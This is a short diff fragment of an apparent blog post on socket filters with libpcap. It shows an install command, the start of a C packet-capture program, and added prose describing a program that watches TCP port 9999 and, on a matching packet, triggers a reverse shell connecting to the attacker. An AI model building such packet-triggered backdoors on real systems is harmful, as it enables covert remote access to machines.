ashizZz/ashizZz.github.io/_posts/2024-09-17-SocketFilters.md

 **libpcap-dev installation**
    `sudo apt install libpcap-dev`
+This program will now capture TCP packets on port 9999 and print a message when it detects a match.
+Upon detecting the packet, it will trigger the reverse shell activation by connecting to the attacker

     #include <pcap.h>
     #include <stdio.h>
     #include <stdlib.h>
+    #include <unistd.h>

     // Declare the packet handler function before main void packet_handler(u_char *user_data, const struct pcap_pkthdr *pkthdr, const u_char *packet);